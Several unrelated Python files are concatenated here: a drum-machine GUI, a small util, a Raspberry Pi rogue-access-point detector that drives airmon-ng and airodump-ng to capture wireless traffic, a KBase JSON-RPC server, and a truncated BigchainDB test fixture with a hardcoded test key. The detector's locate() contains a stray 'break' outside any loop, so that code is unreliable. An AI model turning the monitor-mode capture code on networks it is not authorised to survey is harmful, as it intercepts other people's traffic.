pygame.mixer.Sound(sound_filename).play()
def get_column_from_matrix(self, matrix, i):
return [row[i] for row in matrix]
def play_pattern(self):
self.now_playing = True
self.toggle_play_button_state()
while self.now_playing:
play_list = self.get_is_button_clicked_list()
num_columns = len(play_list[0])
for column_index in range(num_columns):
column_to_play = self.get_column_from_matrix(
play_list, column_index)
for i, item in enumerate(column_to_play):
if item:
sound_filename = self.get_drum_file_path(i)
self.play_sound(sound_filename)
time.sleep(self.time_to_play_each_column())
if not self.now_playing: break
if not self.loop: break
self.now_playing = False
self.toggle_play_button_state()
def time_to_play_each_column(self):
beats_per_second = self.beats_per_minute / 60
time_to_play_each_column = 1 / beats_per_second
return time_to_play_each_column
def on_loop_button_toggled(self):
self.loop = self.loopbuttonvar.get()
def on_beats_per_minute_changed(self):
self.beats_per_minute = int(self.beats_per_minute_widget.get())
def init_is_button_clicked_list(self, num_of_rows, num_of_columns):
return [[False] * num_of_columns for x in range(num_of_rows)]
def get_button_value(self, row, col):
return self.all_patterns[self.current_pattern_index][
'is_button_clicked_list'][row][col]
def find_number_of_columns(self):
return int(self.number_of_units_widget.get()) * int(self.bpu_widget.get())
def process_button_clicked(self, row, col):
self.set_button_value(row, col, not self.get_button_value(row, col))
self.display_button_color(row, col)
def set_button_value(self, row, col, bool_value):
self.all_patterns[self.current_pattern_index][
'is_button_clicked_list'][row][col] = bool_value
def on_button_clicked(self, row, col):
def event_handler():
self.process_button_clicked(row, col)
return event_handler
def display_all_button_colors(self):
number_of_columns = self.find_number_of_columns()
for r in range(MAX_NUMBER_OF_DRUM_SAMPLES):
for c in range(number_of_columns):
self.display_button_color(r, c)
def display_button_color(self, row, col):
bpu = int(self.bpu_widget.get())
original_color = COLOR_1 if ((col//bpu) % 2) else COLOR_2
button_color = BUTTON_CLICKED_COLOR if self.get_button_value(
row, col) else original_color
self.buttons[row][col].config(background=button_color)
def create_play_bar(self):
playbar_frame = Frame(self.root, height=15)
start_row = MAX_NUMBER_OF_DRUM_SAMPLES + 10
playbar_frame.grid(row=start_row, columnspan=13,
sticky=W + E, padx=15, pady=10)
self.play_icon = PhotoImage(file="images/play.gif")
self.play_button = Button(
playbar_frame, text='Play', image=self.play_icon, compound='left', command=self.on_play_button_clicked)
self.play_button.grid(row=start_row, column=1, padx=2)
Button(playbar_frame, text='Stop', command=self.on_stop_button_clicked).grid(
row=start_row, column=3, padx=2)
self.loopbuttonvar = BooleanVar()
self.loopbuttonvar.set(True)
self.loopbutton = Checkbutton(
playbar_frame, text='Loop', command=self.on_loop_button_toggled, variable=self.loopbuttonvar)
self.loopbutton.grid(row=start_row, column=16, padx=5)
Label(playbar_frame, text='Beats Per Minute').grid(
row=start_row, column=25)
self.beats_per_minute_widget = Spinbox(playbar_frame, from_=MIN_BEATS_PER_MINUTE, to=MAX_BEATS_PER_MINUTE, width=5,
increment=5.0, command=self.on_beats_per_minute_changed)
self.beats_per_minute_widget.grid(row=start_row, column=30)
self.beats_per_minute_widget.delete(0,"end")
self.beats_per_minute_widget.insert(0,INITIAL_BEATS_PER_MINUTE)
photo = PhotoImage(file='images/signature.gif')
label = Label(playbar_frame, image=photo)
label.image = photo
label.grid(row=start_row, column=50, padx=1, sticky='w')
def create_right_button_matrix(self):
right_frame = Frame(self.root)
right_frame.grid(row=10, column=6, sticky=W +
E + N + S, padx=15, pady=4)
self.buttons = [[None for x in range(
self.find_number_of_columns())] for x in range(MAX_NUMBER_OF_DRUM_SAMPLES)]
for row in range(MAX_NUMBER_OF_DRUM_SAMPLES):
for col in range(self.find_number_of_columns()):
self.buttons[row][col] = Button(
right_frame, command=self.on_button_clicked(row, col))
self.buttons[row][col].grid(row=row, column=col)
self.display_button_color(row, col)
def create_left_drum_loader(self):
left_frame = Frame(self.root)
left_frame.grid(row=10, column=0, columnspan=6, sticky=W + E + N + S)
open_file_icon = PhotoImage(file='images/openfile.gif')
for i in range(MAX_NUMBER_OF_DRUM_SAMPLES):
open_file_button = Button(left_frame, image=open_file_icon,
command=self.on_open_file_button_clicked(i))
open_file_button.image = open_file_icon
open_file_button.grid(row=i, column=0, padx=5, pady=4)
self.drum_load_entry_widget[i] = Entry(left_frame)
self.drum_load_entry_widget[i].grid(
row=i, column=4, padx=7, pady=4)
def create_top_bar(self):
topbar_frame = Frame(self.root, height=25)
topbar_frame.grid(row=0, columnspan=12, rowspan=10, padx=5, pady=5)
Label(topbar_frame, text='Pattern Number:').grid(row=0, column=1)
self.pattern_index_widget = Spinbox(topbar_frame, from_=0, to=MAX_NUMBER_OF_PATTERNS - 1, width=5,
command=self.on_pattern_changed)
self.pattern_index_widget.grid(row=0, column=2)
self.current_pattern_name_widget = Entry(topbar_frame)
self.current_pattern_name_widget.grid(row=0, column=3, padx=7, pady=2)
Label(topbar_frame, text='Number of Units:').grid(row=0, column=4)
self.number_of_units_widget = Spinbox(topbar_frame, from_=1, to=MAX_NUMBER_OF_UNITS, width=5,
command=self.on_number_of_units_changed)
self.number_of_units_widget.delete(0,"end")
self.number_of_units_widget.insert(0,INITIAL_NUMBER_OF_UNITS)
self.number_of_units_widget.grid(row=0, column=5)
Label(topbar_frame, text='BPUs:').grid(row=0, column=6)
self.bpu_widget = Spinbox(topbar_frame, from_=1, to=MAX_BPU, width=5,
command=self.on_bpu_changed)
self.bpu_widget.grid(row=0, column=7)
self.bpu_widget.delete(0,"end")
self.bpu_widget.insert(0,INITIAL_BPU)
def create_top_menu(self):
self.menu_bar = Menu(self.root)
self.file_menu = Menu(self.menu_bar, tearoff=0)
self.file_menu.add_command(label="Load Project")
self.file_menu.add_command(label="Save Project")
self.file_menu.add_separator()
self.file_menu.add_command(label="Exit")
self.menu_bar.add_cascade(label="File", menu=self.file_menu)
self.about_menu = Menu(self.menu_bar, tearoff=0)
self.about_menu.add_command(label="About")
self.menu_bar.add_cascade(label="About", menu=self.about_menu)
self.root.config(menu=self.menu_bar)
def init_gui(self):
self.create_top_menu()
self.create_top_bar()
self.create_left_drum_loader()
self.create_right_button_matrix()
self.create_play_bar()
if __name__ == '__main__':
root = Tk()
DrumMachine(root)
root.mainloop()
|
util.py
|
import logging
from threading import Thread
from functools import wraps
logger = logging.getLogger()
logger.setLevel(logging.DEBUG)
stream_handler = logging.StreamHandler()
formatter = logging.Formatter("[%(filename)s] %(levelname)s | %(message)s")
stream_handler.setFormatter(formatter)
logger.addHandler(stream_handler)
logger.disabled = True
def threaded(func):
@wraps(func)
def wrapper(*args, **kwargs):
t_handler = Thread(target=func, args=args, kwargs=kwargs)
t_handler.daemon = True
t_handler.start()
return wrapper
|
Aircrack.py
|
#!/usr/bin/env python
# -*- coding: utf-8 -*-
#
# Aircrack.py
#
# Copyright 2013 Brandon Knight <kaospunk@gmail.com>
#
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions are
# met:
#
# * Redistributions of source code must retain the above copyright
# notice, this list of conditions and the following disclaimer.
# * Redistributions in binary form must reproduce the above
# copyright notice, this list of conditions and the following disclaimer
# in the documentation and/or other materials provided with the
# distribution.
# * Neither the name of the nor the names of its
# contributors may be used to endorse or promote products derived from
# this software without specific prior written permission.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS
# "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT
# LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR
# A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT
# OWNER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL,
# SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT
# LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE,
# DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY
# THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT
# (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE
# OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
#
import calendar
import datetime
import glob
import os
import shutil
import subprocess
import time
from Adafruit_CharLCDPlate import *
from EspeakDriver import EspeakDriver
from FrequencyGenerator import FrequencyGenerator
from LCD import *
from threading import Thread, Event
from xml.etree import ElementTree
class Airmon:
airmon_bin = "/usr/sbin/airmon-ng"
iwconfig_bin = "/sbin/iwconfig"
def __init__(self, interface):
self.interface = interface
def stop(self):
subprocess.Popen([self.airmon_bin, "stop", "mon0"], bufsize=0, stdout=open(os.devnull, "w"), stderr=open(os.devnull, "w"))
time.sleep(5)
def start(self):
airmon = subprocess.Popen([self.airmon_bin, "start", self.interface], bufsize=0, stdout=open(os.devnull, "w"), stderr=open(os.devnull, "w"))
time.sleep(5)
def restart(self):
self.stop()
self.start()
class Airodump:
base_dir = '/home/securestate/'
airodump_bin = '/usr/sbin/airodump-ng'
whitelist_file = 'apwhitelist.txt'
usb_dir = '/media/usbdevice/'
MINIMUM_SIGNAL = -110
def __init__(self, lcd, essid = None, bssid = None, channel = None):
self.bssid = bssid
self.channel = channel
self.essid = essid
if essid == None:
self.capture_file = "main"
else:
self.capture_file = bssid.replace(":", "_") + essid
self.lcd = lcd
self.tone = FrequencyGenerator()
self.rssi_event = Event()
self.parse_event = Event()
self.espeak_drv = EspeakDriver()
self.rogue_aps = []
self.good_aps = []
self.get_whitelist()
def stop(self):
self.proc_handle.terminate()
time.sleep(5)
self.parse_event.clear()
def start(self):
if self.capture_file == "main":
self.proc_handle = subprocess.Popen([self.airodump_bin, "-w", "main", "mon0"], bufsize=0, stdout=open(os.devnull, "w"), stderr=open(os.devnull, "w"))
self.parse_event.set()
self.parse_thread = Thread(target=self.parser)
self.parse_thread.daemon = True
self.parse_thread.start()
else:
self.proc_handle = subprocess.Popen([self.airodump_bin, "--bssid", self.bssid, "--channel", self.channel, "-w", self.capture_file, "mon0"], bufsize=0, stdout=open(os.devnull, "w"), stderr=open(os.devnull, "w"))
def restart(self):
self.stop()
self.start()
def locate(self):
self.lcd.set_color("red")
self.lcd.display("Locking on")
self.start()
self.rssi_event.set()
self.rssi = Thread(target=self.rssi_tone)
self.rssi.start()
while self.rssi.is_alive() and self.lcd.get_button_press(False) != "Select":
pass
self.rssi_event.clear()
break
self.stop()
self.lcd.wipe()
return
def rssi_tone(self):
if self.capture_file == "main":
return
signal = True
time.sleep(5)
latest_file = self.get_latest_file()
print "Using " + latest_file
while True and signal:
if not self.rssi_event.is_set():
break
try:
tree = ElementTree.parse(latest_file)
except:
continue
root = tree.getroot()
for network in root.findall("wireless-network"):
rssi = network.find("snr-info/last_signal_rssi").text
print rssi
essid = network.find("SSID/essid").text
last_seen = network.get("last-time")
print last_seen
(dow, month, day, ltime, year) = last_seen.split()
for mon in xrange(1, 13):
if calendar.month_abbr[mon] == month:
break
(hour, minute, second) = ltime.split(":")
lastseen = datetime.datetime(int(year), mon, int(day), int(hour), int(minute), int(second))
delta = datetime.datetime.now() - lastseen
print "Delta " + str(delta)
if delta.total_seconds() > 60:
self.lcd.display("Signal Lost", 2)
signal = False
self.rssi_event.clear()
break
abs_value = abs(int(rssi))
freq = float(2.5/abs_value) * 10000
self.lcd.display("Target: {0}dbm\n{1}".format(rssi, essid))
self.tone.sine_wave(freq)
def get_signal_strength(self, bssid):
if self.capture_file == "main":
return
file = self.get_latest_file()
tree = ElementTree.parse(file)
root = tree.getroot()
for network in root.findall("wireless-network"):
if network.find("BSSID").text == bssid:
return network.find("snr-info/last_signal_rssi")
def get_latest_file(self):
latest_track = 0
latest_file = ''
for file in glob.glob(self.base_dir + self.capture_file + "*.kismet.netxml"):
pieces = file.split("-")
number = pieces[-1].split(".")[0]
if number > latest_track:
latest_track = number
latest_file = file
return latest_file
def get_whitelist(self):
ap_file = open(self.base_dir + self.whitelist_file, 'r')
for ap in ap_file:
self.good_aps.append(ap.rstrip())
def clear_rogues(self):
del self.rogue_aps[:]
def parser(self):
latest_file = self.get_latest_file()
time.sleep(5)
while self.parse_event.is_set():
try:
tree = ElementTree.parse(latest_file)
except:
continue
root = tree.getroot()
for network in root.findall("wireless-network"):
rssi = int(network.find("snr-info/last_signal_rssi").text)
essid = network.find("SSID/essid").text
bssid = network.find("BSSID").text
channel = network.find("channel").text
found = False
for rogue in self.rogue_aps:
if rogue[1] == bssid:
found = True
if not found and bssid not in self.good_aps and rssi > self.MINIMUM_SIGNAL:
self.rogue_aps.append((essid, bssid, channel))
print("New rogue AP found with name: {0}").format(essid)
self.espeak_drv.speak('New Rogue AP found with name {0}'.format(essid))
def update_whitelist(self):
del self.good_aps[:]
try:
source_file = open(self.usb_dir + self.whitelist_file, 'r')
output_string = ''
for ap in source_file:
self.good_aps.append(ap.rstrip())
output_string += ap
for rogue in self.rogue_aps:
if rogue[1] == ap.rstrip():
self.rogue_aps.remove(rogue)
dest_file = open(self.base_dir + self.whitelist_file, 'w')
dest_file.write(output_string)
return "Success"
except Exception as e:
return "Error occurred"
def backup_files(self):
try:
for file in glob.glob(self.base_dir + "*.csv"):
shutil.copy(file, self.usb_dir + file.split("/")[-1])
for file in glob.glob(self.base_dir + "*.cap"):
shutil.copy(file, self.usb_dir + file.split("/")[-1])
for file in glob.glob(self.base_dir + "*.netxml"):
shutil.copy(file, self.usb_dir + file.split("/")[-1])
return "Success"
except Exception:
return "Error occurred"
def main():
lcd = LCD()
airmon = Airmon("wlan0")
airmon.start()
main_airdump = Airodump(lcd)
main_airdump.start()
for x in xrange(100):
print str(x)
time.sleep(1)
main_airdump.stop()
print "done"
if __name__ == "__main__":
main()
|
kb_hisat2Server.py
|
#!/usr/bin/env python
# -*- coding: utf-8 -*-
from wsgiref.simple_server import make_server
import sys
import json
import traceback
import datetime
from multiprocessing import Process
from getopt import getopt, GetoptError
from jsonrpcbase import JSONRPCService, InvalidParamsError, KeywordError,\
JSONRPCError, InvalidRequestError
from jsonrpcbase import ServerError as JSONServerError
from os import environ
from ConfigParser import ConfigParser
from biokbase import log
import requests as _requests
import random as _random
import os
from kb_hisat2.authclient import KBaseAuth as _KBaseAuth
DEPLOY = 'KB_DEPLOYMENT_CONFIG'
SERVICE = 'KB_SERVICE_NAME'
AUTH = 'auth-service-url'
# Note that the error fields do not match the 2.0 JSONRPC spec
def get_config_file():
return environ.get(DEPLOY, None)
def get_service_name():
return environ.get(SERVICE, None)
def get_config():
if not get_config_file():
return None
retconfig = {}
config = ConfigParser()
config.read(get_config_file())
for nameval in config.items(get_service_name() or 'kb_hisat2'):
retconfig[nameval[0]] = nameval[1]
return retconfig
config = get_config()
from kb_hisat2.kb_hisat2Impl import kb_hisat2 # noqa @IgnorePep8
impl_kb_hisat2 = kb_hisat2(config)
class JSONObjectEncoder(json.JSONEncoder):
def default(self, obj):
if isinstance(obj, set):
return list(obj)
if isinstance(obj, frozenset):
return list(obj)
if hasattr(obj, 'toJSONable'):
return obj.toJSONable()
return json.JSONEncoder.default(self, obj)
class JSONRPCServiceCustom(JSONRPCService):
def call(self, ctx, jsondata):
"""
Calls jsonrpc service's method and returns its return value in a JSON
string or None if there is none.
Arguments:
jsondata -- remote method call in jsonrpc format
"""
result = self.call_py(ctx, jsondata)
if result is not None:
return json.dumps(result, cls=JSONObjectEncoder)
return None
def _call_method(self, ctx, request):
"""Calls given method with given params and returns it value."""
method = self.method_data[request['method']]['method']
params = request['params']
result = None
try:
if isinstance(params, list):
# Does it have enough arguments?
if len(params) < self._man_args(method) - 1:
raise InvalidParamsError('not enough arguments')
# Does it have too many arguments?
if(not self._vargs(method) and len(params) >
self._max_args(method) - 1):
raise InvalidParamsError('too many arguments')
result = method(ctx, *params)
elif isinstance(params, dict):
# Do not accept keyword arguments if the jsonrpc version is
# not >=1.1.
if request['jsonrpc'] < 11:
raise KeywordError
result = method(ctx, **params)
else: # No params
result = method(ctx)
except JSONRPCError:
raise
except Exception as e:
# log.exception('method %s threw an exception' % request['method'])
# Exception was raised inside the method.
newerr = JSONServerError()
newerr.trace = traceback.format_exc()
if isinstance(e.message, basestring):
newerr.data = e.message
else:
# Some exceptions embed other exceptions as the message
newerr.data = repr(e.message)
raise newerr
return result
def call_py(self, ctx, jsondata):
"""
Calls jsonrpc service's method and returns its return value in python
object format or None if there is none.
This method is same as call() except the return value is a python
object instead of JSON string. This method is mainly only useful for
debugging purposes.
"""
rdata = jsondata
# we already deserialize the json string earlier in the server code, no
# need to do it again
# try:
# rdata = json.loads(jsondata)
# except ValueError:
# raise ParseError
# set some default values for error handling
request = self._get_default_vals()
if isinstance(rdata, dict) and rdata:
# It's a single request.
self._fill_request(request, rdata)
respond = self._handle_request(ctx, request)
# Don't respond to notifications
if respond is None:
return None
return respond
elif isinstance(rdata, list) and rdata:
# It's a batch.
requests = []
responds = []
for rdata_ in rdata:
# set some default values for error handling
request_ = self._get_default_vals()
self._fill_request(request_, rdata_)
requests.append(request_)
for request_ in requests:
respond = self._handle_request(ctx, request_)
# Don't respond to notifications
if respond is not None:
responds.append(respond)
if responds:
return responds
# Nothing to respond.
return None
else:
# empty dict, list or wrong type
raise InvalidRequestError
def _handle_request(self, ctx, request):
"""Handles given request and returns its response."""
if self.method_data[request['method']].has_key('types'): # noqa @IgnorePep8
self._validate_params_types(request['method'], request['params'])
result = self._call_method(ctx, request)
# Do not respond to notifications.
if request['id'] is None:
return None
respond = {}
self._fill_ver(request['jsonrpc'], respond)
respond['result'] = result
respond['id'] = request['id']
return respond
class MethodContext(dict):
def __init__(self, logger):
self['client_ip'] = None
self['user_id'] = None
self['authenticated'] = None
self['token'] = None
self['module'] = None
self['method'] = None
self['call_id'] = None
self['rpc_context'] = None
self['provenance'] = None
self._debug_levels = set([7, 8, 9, 'DEBUG', 'DEBUG2', 'DEBUG3'])
self._logger = logger
def log_err(self, message):
self._log(log.ERR, message)
def log_info(self, message):
self._log(log.INFO, message)
def log_debug(self, message, level=1):
if level in self._debug_levels:
pass
else:
level = int(level)
if level < 1 or level > 3:
raise ValueError("Illegal log level: " + str(level))
level = level + 6
self._log(level, message)
def set_log_level(self, level):
self._logger.set_log_level(level)
def get_log_level(self):
return self._logger.get_log_level()
def clear_log_level(self):
self._logger.clear_user_log_level()
def _log(self, level, message):
self._logger.log_message(level, message, self['client_ip'],
self['user_id'], self['module'],
self['method'], self['call_id'])
def provenance(self):
callbackURL = os.environ.get('SDK_CALLBACK_URL')
if callbackURL:
# OK, there's a callback server from which we can get provenance
arg_hash = {'method': 'CallbackServer.get_provenance',
'params': [],
'version': '1.1',
'id': str(_random.random())[2:]
}
body = json.dumps(arg_hash)
response = _requests.post(callbackURL, data=body,
timeout=60)
response.encoding = 'utf-8'
if response.status_code == 500:
if ('content-type' in response.headers and
response.headers['content-type'] ==
'application/json'):
err = response.json()
if 'error' in err:
raise ServerError(**err['error'])
else:
raise ServerError('Unknown', 0, response.text)
else:
raise ServerError('Unknown', 0, response.text)
if not response.ok:
response.raise_for_status()
resp = response.json()
if 'result' not in resp:
raise ServerError('Unknown', 0,
'An unknown server error occurred')
return resp['result'][0]
else:
return self.get('provenance')
class ServerError(Exception):
'''
The call returned an error. Fields:
name - the name of the error.
code - the error code.
message - a human readable error message.
data - the server side stacktrace.
'''
def __init__(self, name, code, message, data=None, error=None):
super(Exception, self).__init__(message)
self.name = name
self.code = code
self.message = message if message else ''
self.data = data or error or ''
# data = JSON RPC 2.0, error = 1.1
def __str__(self):
return self.name + ': ' + str(self.code) + '. ' + self.message + \
'\n' + self.data
def getIPAddress(environ):
xFF = environ.get('HTTP_X_FORWARDED_FOR')
realIP = environ.get('HTTP_X_REAL_IP')
trustXHeaders = config is None or \
config.get('dont_trust_x_ip_headers') != 'true'
if (trustXHeaders):
if (xFF):
return xFF.split(',')[0].strip()
if (realIP):
return realIP.strip()
return environ.get('REMOTE_ADDR')
class Application(object):
# Wrap the wsgi handler in a class definition so that we can
# do some initialization and avoid regenerating stuff over
# and over
def logcallback(self):
self.serverlog.set_log_file(self.userlog.get_log_file())
def log(self, level, context, message):
self.serverlog.log_message(level, message, context['client_ip'],
context['user_id'], context['module'],
context['method'], context['call_id'])
def __init__(self):
submod = get_service_name() or 'kb_hisat2'
self.userlog = log.log(
submod, ip_address=True, authuser=True, module=True, method=True,
call_id=True, changecallback=self.logcallback,
config=get_config_file())
self.serverlog = log.log(
submod, ip_address=True, authuser=True, module=True, method=True,
call_id=True, logfile=self.userlog.get_log_file())
self.serverlog.set_log_level(6)
self.rpc_service = JSONRPCServiceCustom()
self.method_authentication = dict()
self.rpc_service.add(impl_kb_hisat2.run_hisat2,
name='kb_hisat2.run_hisat2',
types=[dict])
self.method_authentication['kb_hisat2.run_hisat2'] = 'required' # noqa
self.rpc_service.add(impl_kb_hisat2.status,
name='kb_hisat2.status',
types=[dict])
authurl = config.get(AUTH) if config else None
self.auth_client = _KBaseAuth(authurl)
def __call__(self, environ, start_response):
# Context object, equivalent to the perl impl CallContext
ctx = MethodContext(self.userlog)
ctx['client_ip'] = getIPAddress(environ)
status = '500 Internal Server Error'
try:
body_size = int(environ.get('CONTENT_LENGTH', 0))
except (ValueError):
body_size = 0
if environ['REQUEST_METHOD'] == 'OPTIONS':
# we basically do nothing and just return headers
status = '200 OK'
rpc_result = ""
else:
request_body = environ['wsgi.input'].read(body_size)
try:
req = json.loads(request_body)
except ValueError as ve:
err = {'error': {'code': -32700,
'name': "Parse error",
'message': str(ve),
}
}
rpc_result = self.process_error(err, ctx, {'version': '1.1'})
else:
ctx['module'], ctx['method'] = req['method'].split('.')
ctx['call_id'] = req['id']
ctx['rpc_context'] = {
'call_stack': [{'time': self.now_in_utc(),
'method': req['method']}
]
}
prov_action = {'service': ctx['module'],
'method': ctx['method'],
'method_params': req['params']
}
ctx['provenance'] = [prov_action]
try:
token = environ.get('HTTP_AUTHORIZATION')
# parse out the method being requested and check if it
# has an authentication requirement
method_name = req['method']
auth_req = self.method_authentication.get(
method_name, 'none')
if auth_req != 'none':
if token is None and auth_req == 'required':
err = JSONServerError()
err.data = (
'Authentication required for ' +
'kb_hisat2 ' +
'but no authentication header was passed')
raise err
elif token is None and auth_req == 'optional':
pass
else:
try:
user = self.auth_client.get_user(token)
ctx['user_id'] = user
ctx['authenticated'] = 1
ctx['token'] = token
except Exception, e:
if auth_req == 'required':
err = JSONServerError()
err.data = \
"Token validation failed: %s" % e
raise err
if (environ.get('HTTP_X_FORWARDED_FOR')):
self.log(log.INFO, ctx, 'X-Forwarded-For: ' +
environ.get('HTTP_X_FORWARDED_FOR'))
self.log(log.INFO, ctx, 'start method')
rpc_result = self.rpc_service.call(ctx, req)
self.log(log.INFO, ctx, 'end method')
status = '200 OK'
except JSONRPCError as jre:
err = {'error': {'code': jre.code,
'name': jre.message,
'message': jre.data
}
}
trace = jre.trace if hasattr(jre, 'trace') else None
rpc_result = self.process_error(err, ctx, req, trace)
except Exception:
err = {'error': {'code': 0,
'name': 'Unexpected Server Error',
'message': 'An unexpected server error ' +
'occurred',
}
}
rpc_result = self.process_error(err, ctx, req,
traceback.format_exc())
# print 'Request method was %s\n' % environ['REQUEST_METHOD']
# print 'Environment dictionary is:\n%s\n' % pprint.pformat(environ)
# print 'Request body was: %s' % request_body
# print 'Result from the method call is:\n%s\n' % \
# pprint.pformat(rpc_result)
if rpc_result:
response_body = rpc_result
else:
response_body = ''
response_headers = [
('Access-Control-Allow-Origin', '*'),
('Access-Control-Allow-Headers', environ.get(
'HTTP_ACCESS_CONTROL_REQUEST_HEADERS', 'authorization')),
('content-type', 'application/json'),
('content-length', str(len(response_body)))]
start_response(status, response_headers)
return [response_body]
def process_error(self, error, context, request, trace=None):
if trace:
self.log(log.ERR, context, trace.split('\n')[0:-1])
if 'id' in request:
error['id'] = request['id']
if 'version' in request:
error['version'] = request['version']
e = error['error'].get('error')
if not e:
error['error']['error'] = trace
elif 'jsonrpc' in request:
error['jsonrpc'] = request['jsonrpc']
error['error']['data'] = trace
else:
error['version'] = '1.0'
error['error']['error'] = trace
return json.dumps(error)
def now_in_utc(self):
# noqa Taken from http://stackoverflow.com/questions/3401428/how-to-get-an-isoformat-datetime-string-including-the-default-timezone @IgnorePep8
dtnow = datetime.datetime.now()
dtutcnow = datetime.datetime.utcnow()
delta = dtnow - dtutcnow
hh, mm = divmod((delta.days * 24 * 60 * 60 + delta.seconds + 30) // 60,
60)
return "%s%+02d:%02d" % (dtnow.isoformat(), hh, mm)
application = Application()
# This is the uwsgi application dictionary. On startup uwsgi will look
# for this dict and pull its configuration from here.
# This simply lists where to "mount" the application in the URL path
#
# This uwsgi module "magically" appears when running the app within
# uwsgi and is not available otherwise, so wrap an exception handler
# around it
#
# To run this server in uwsgi with 4 workers listening on port 9999 use:
# uwsgi -M -p 4 --http :9999 --wsgi-file _this_file_
# To run a using the single threaded python BaseHTTP service
# listening on port 9999 by default execute this file
#
try:
import uwsgi
# Before we do anything with the application, see if the
# configs specify patching all std routines to be asynch
# *ONLY* use this if you are going to wrap the service in
# a wsgi container that has enabled gevent, such as
# uwsgi with the --gevent option
if config is not None and config.get('gevent_monkeypatch_all', False):
print "Monkeypatching std libraries for async"
from gevent import monkey
monkey.patch_all()
uwsgi.applications = {'': application}
except ImportError:
# Not available outside of wsgi, ignore
pass
_proc = None
def start_server(host='localhost', port=0, newprocess=False):
'''
By default, will start the server on localhost on a system assigned port
in the main thread. Excecution of the main thread will stay in the server
main loop until interrupted. To run the server in a separate process, and
thus allow the stop_server method to be called, set newprocess = True. This
will also allow returning of the port number.'''
global _proc
if _proc:
raise RuntimeError('server is already running')
httpd = make_server(host, port, application)
port = httpd.server_address[1]
print "Listening on port %s" % port
if newprocess:
_proc = Process(target=httpd.serve_forever)
_proc.daemon = True
_proc.start()
else:
httpd.serve_forever()
return port
def stop_server():
global _proc
_proc.terminate()
_proc = None
def process_async_cli(input_file_path, output_file_path, token):
exit_code = 0
with open(input_file_path) as data_file:
req = json.load(data_file)
if 'version' not in req:
req['version'] = '1.1'
if 'id' not in req:
req['id'] = str(_random.random())[2:]
ctx = MethodContext(application.userlog)
if token:
user = application.auth_client.get_user(token)
ctx['user_id'] = user
ctx['authenticated'] = 1
ctx['token'] = token
if 'context' in req:
ctx['rpc_context'] = req['context']
ctx['CLI'] = 1
ctx['module'], ctx['method'] = req['method'].split('.')
prov_action = {'service': ctx['module'], 'method': ctx['method'],
'method_params': req['params']}
ctx['provenance'] = [prov_action]
resp = None
try:
resp = application.rpc_service.call_py(ctx, req)
except JSONRPCError as jre:
trace = jre.trace if hasattr(jre, 'trace') else None
resp = {'id': req['id'],
'version': req['version'],
'error': {'code': jre.code,
'name': jre.message,
'message': jre.data,
'error': trace}
}
except Exception:
trace = traceback.format_exc()
resp = {'id': req['id'],
'version': req['version'],
'error': {'code': 0,
'name': 'Unexpected Server Error',
'message': 'An unexpected server error occurred',
'error': trace}
}
if 'error' in resp:
exit_code = 500
with open(output_file_path, "w") as f:
f.write(json.dumps(resp, cls=JSONObjectEncoder))
return exit_code
if __name__ == "__main__":
if (len(sys.argv) >= 3 and len(sys.argv) <= 4 and
os.path.isfile(sys.argv[1])):
token = None
if len(sys.argv) == 4:
if os.path.isfile(sys.argv[3]):
with open(sys.argv[3]) as token_file:
token = token_file.read()
else:
token = sys.argv[3]
sys.exit(process_async_cli(sys.argv[1], sys.argv[2], token))
try:
opts, args = getopt(sys.argv[1:], "", ["port=", "host="])
except GetoptError as err:
# print help information and exit:
print str(err) # will print something like "option -a not recognized"
sys.exit(2)
port = 9999
host = 'localhost'
for o, a in opts:
if o == '--port':
port = int(a)
elif o == '--host':
host = a
print "Host set to %s" % host
else:
assert False, "unhandled option"
start_server(host=host, port=port)
# print "Listening on port %s" % port
# httpd = make_server( host, port, application)
#
# httpd.serve_forever()
|
conftest.py
|
"""Fixtures and setup / teardown functions
Tasks:
1. setup test database before starting the tests
2. delete test database after running the tests
"""
import os
import copy
import random
from collections import namedtuple
from logging import getLogger
from logging.config import dictConfig
import pytest
from pymongo import MongoClient
from bigchaindb.common import crypto
TEST_DB_NAME = 'bigchain_test'
USER2_SK, USER2_PK = crypto.generate_key_pair()
# Test user. inputs will be created for this user. Cryptography Keys
USER_PRIVATE_KEY = '8eJ8q9ZQpReWyQT5aFCiwtZ5wDZC4eDnCen88p3tQ6ie'
USER_PUBLIC_KEY = 'JEAkEJqLbbgDRAtMm8YAjGp759Aq2qTn9eaEHUj2XePE'
def pytest_runtest_setup(item):
if isinstance(item, item.Function):
backend = item.session.config.getoption('--database-backend')
if (item.get_marker('localmongodb') and backend != 'localmongodb'):
pytest.skip('Skip tendermint specific tests if not using localmongodb')
def pytest_addoption(parser):
from bigchaindb.backend.connection import BACKENDS
BACKENDS['mongodb-ssl'] = 'bigchaindb.backend.mongodb.connection.MongoDBConnection'
backends = ', '.join(BACKENDS.keys())
parser.addoption(
'--database-backend',
action='store',
default=os.environ.get('BIGCHAINDB_DATABASE_BACKEND', 'rethinkdb'),
help='Defines the backend to use (available: {})'.format(backends),
)
def pytest_ignore_collect(path, config):
from bigchaindb.backend.connection import BACKENDS
path = str(path)
BACKENDS['mongodb-ssl'] = 'bigchaindb.backend.mongodb.connection.MongoDBConnection'
supported_backends = BACKENDS.keys()
if os.path.isdir(path):
dirname = os.path.split(path)[1]
if dirname in supported_backends and dirname != config.getoption('--database-backend'):
print('Ignoring unrequested backend test dir: ', path)
return True
def pytest_configure(config):
config.addinivalue_line(
'markers',
'bdb(): Mark the test as needing BigchainDB, i.e. a database with '
'the three tables: "backlog", "bigchain", "votes". BigchainDB will '
'be configured such that the database and tables are available for an '
'entire test session. For distributed tests, the database name will '
